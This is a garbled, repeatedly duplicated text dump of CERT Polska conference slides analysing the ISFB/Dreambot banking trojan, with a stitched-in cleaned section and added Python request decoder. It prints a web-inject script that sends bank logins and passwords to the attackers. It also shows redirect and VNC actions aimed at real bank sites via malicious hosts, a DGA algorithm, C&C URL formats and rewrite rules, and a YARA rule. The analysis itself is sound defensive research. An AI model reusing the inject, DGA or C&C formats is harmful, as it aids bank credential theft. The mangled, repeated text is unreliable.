IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 21: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL format

The request is built from a printf-style template:

    https://%s/?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

Old format, t[RAND].php?[RAND]=data:

    tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

Plaintext of such a query (the first pair is random padding):

    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

Current format, the encrypted query hidden in an image path:

    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul
    jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

Decoding a request (Python 2; decrypt() and SKEY come from the author's tooling):

    import re
    import pprint

    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    # '+' and '/' in the base64 are sent as _2B and _2F
    d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='           # padding is stripped on the wire
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

    {'crc': '7001380', 'id': '1065', 'ppc': 'xi', 'server': '12', 'soft': '1',
     'user': '0c0d784a0cf755970edbdf4c0cb27fca', 'version': '214887'}

Endpoints:

    t*.php          get new task              used until Sep 2015
    c*.php          get new config            used until Sep 2015
    d*.php          send stolen data          used until Sep 2015
    images/*.gif    get new task              current format
    images/*.jpeg   get new config            current format
    images/*.bmp    send stolen data          current format
    images/*.avi    download 2nd stage DLL    not every C&C
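A Python 3 rework of the request decoding shown above, together with a classifier for the endpoint table, added as an example; it is not the speaker's tool. The campaign-key cipher is not reproduced: `decrypt`/`encrypt` are caller-supplied stand-ins (identity in the test), the `_XX` unescaping and padding repair follow the snippet above, and the URLs used in the test are constructed.

```python
import base64
import re
from urllib.parse import urlsplit

# Added example, not the speaker's code. Decryption with the campaign key is
# left to the caller; everything else mirrors the decoding steps on the slide.
_ESC = re.compile(r"_([0-9A-Fa-f]{2})")


def unescape_isfb_b64(token: str) -> str:
    """Undo the bot's '_XX' escaping of base64 characters ('+' -> _2B, '/' -> _2F)."""
    return _ESC.sub(lambda m: chr(int(m.group(1), 16)), token)


def escape_isfb_b64(b64: str) -> str:
    """Inverse of unescape_isfb_b64(); padding is dropped as it is on the wire."""
    return b64.replace("+", "_2B").replace("/", "_2F").replace("=", "")


def b64_decode_lenient(s: str) -> bytes:
    """base64 decode that re-pads to a multiple of four instead of trusting '='."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def parse_query(plain: bytes) -> dict:
    """Split NUL-padded 'k=v&k=v' into a dict; random pairs like oxsxc=kcxsfx stay."""
    out = {}
    for pair in plain.rstrip(b"\x00").decode("ascii").split("&"):
        if pair:
            k, _, v = pair.partition("=")
            out[k] = v
    return out


def decode_request(token: str, decrypt) -> dict:
    """token -> unescape -> base64 -> decrypt(bytes) -> key/value dict."""
    return parse_query(decrypt(b64_decode_lenient(unescape_isfb_b64(token))))


def encode_request(params: dict, encrypt) -> str:
    """Build a token the way the bot does; used to construct test input."""
    plain = "&".join(f"{k}={v}" for k, v in params.items()).encode("ascii")
    return escape_isfb_b64(base64.b64encode(encrypt(plain)).decode("ascii"))


# Endpoint table from the slide: (path pattern, purpose, URL generation).
ENDPOINTS = [
    (re.compile(r"^/t[^/]*\.php$"), "task", "old"),
    (re.compile(r"^/c[^/]*\.php$"), "config", "old"),
    (re.compile(r"^/d[^/]*\.php$"), "data", "old"),
    (re.compile(r"^/images/.*\.gif$"), "task", "current"),
    (re.compile(r"^/images/.*\.jpeg$"), "config", "current"),
    (re.compile(r"^/images/.*\.bmp$"), "data", "current"),
    (re.compile(r"^/images/.*\.avi$"), "loader", "current"),
]


def classify(url: str):
    """Map a request URL to (purpose, generation) or None if it is not ISFB-shaped."""
    path = urlsplit(url).path
    for rx, purpose, gen in ENDPOINTS:
        if rx.match(path):
            return purpose, gen
    return None


if __name__ == "__main__":
    tok = encode_request({"oxsxc": "kcxsfx", "version": "212356", "id": "1000"}, lambda p: p)
    print(tok, decode_request(tok, lambda c: c))
    print(classify("http://cnc.tld/images/8Gmj7f1bp/jOBc27_2B_2F.jpeg"))
```

The path classifier alone is a weak indicator (any site may serve `/images/x.jpeg`); it becomes useful once the path component decodes to base64 of the expected length and the decrypted query contains the `version=`/`user=`/`crc=` pairs.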

C&C response

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32-bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response

Command and Control

IAP (nginx rewrite rules)

    rewrite ^/fileto/(.*)(\.bin)   /get128.php?x=$1   break;
    rewrite ^/images/(.*)(\.bmp)   /data.php?x=$1$2   break;
    rewrite ^/images/(.*)(\.avi)   /loader.php?x=$1$2 break;
    rewrite ^/images/(.*)(\.gif)   /task.php?x=$1$2   break;
    rewrite ^/images/(.*)(\.jpeg)  /config.php?x=$1$2 break;

Dreambot (Apache rewrite rules)

    RewriteEngine on
    RewriteRule ^c(.+)\.php$          new_chandler.php           [L,QSA]
    RewriteRule ^t(.+)\.php$          new_thandler.php           [L,QSA]
    RewriteRule ^d(.+)\.php$          new_dhandler.php           [L,QSA]
    RewriteRule ^images/(.*)(\.bmp)   new_dhandler.php?q=$1$2    [L,QSA]
    RewriteRule ^images/(.*)(\.gif)   new_thandler.php?q=$1$2    [L,QSA]
    RewriteRule ^images/(.*)(\.jpeg)  new_chandler.php?q=$1$2    [L,QSA]

Dreambot (YARA)

    rule isfb_dreambot : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

The End... or not

Offsprings and Cousins

Common roots / payloads:
· Nymaim / Powersniff
· PunchyBagg

· Bolek / KBOT: based on Gozi
· Rovnix: ISFB was the ring3 payload protected by Rovnix
· Vawtrak: nothing in common

Recap

· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read the paper for more details
· Code soon available at github: mak / random-stuff / isfb

Kudos: people who knowingly (or not) helped us

· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Q & A

info@cert.pl   www.cert.pl
CERTPolska   CERTPolska_en
mak   mak@cert.pl

Page 22: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 23: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

